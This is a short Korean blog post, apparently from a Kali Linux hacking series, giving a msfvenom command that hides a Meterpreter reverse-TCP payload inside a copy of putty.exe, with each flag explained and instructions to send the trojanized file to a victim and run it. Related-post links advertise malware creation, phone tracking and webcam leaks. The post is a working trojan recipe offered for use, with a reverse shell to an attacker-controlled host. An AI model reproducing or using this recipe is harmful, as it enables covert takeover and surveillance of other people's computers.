우선적으로 윈도우의 putty.exe 실행파일을 칼리리눅스에 넣어줍니다.
그 후 다음 명령을 사용합니다.
msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.0.8 lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o fakeputty.exe
-a : 아키텍트 - x86
-x : putty.exe를 사용하겠다
-k : 오리지날 putty.exe를 keep 하겠다.
-e : 인코딩
-i : 반복을 한다는것 인코딩을 3번 반복
-b : 인코딩할때 무시할 문자
-f : 파일 확장자 exe
-o : output
실질적으로는 putty 뿐 아니라 다른 exe 파일도 이런 방식으로 트로이목마를 넣을 수 있습니다.
그후 로컬 핸들러를 틀어주고 fakeputty.exe를 피해자컴퓨터에 보낸뒤 실행시키면 감염이 됩니다.
'2. 시스템 해킹 및 모의 해킹 > Kali Linux' 카테고리의 다른 글
SMB 타겟 스캐닝 및 해당 취약점으로 윈 xp 해킹 (0) | 2023.12.27 |
---|---|
Veil Evasion 악성코드 만들기 + rdesktop 원격조종 (0) | 2023.12.27 |
msfconsole 명령어 정리 - 핸드폰 위치추적 , 웹캠스냅[폰카메라 유출하기] (0) | 2023.12.27 |
암호로 압축된 파일의 압축파일 암호 알아내는법 - [fcrackzip] (0) | 2023.12.27 |
해킹된 컴퓨터를 실시간 모니터링하기 & 자동 스크린샷 캡처 (0) | 2023.12.26 |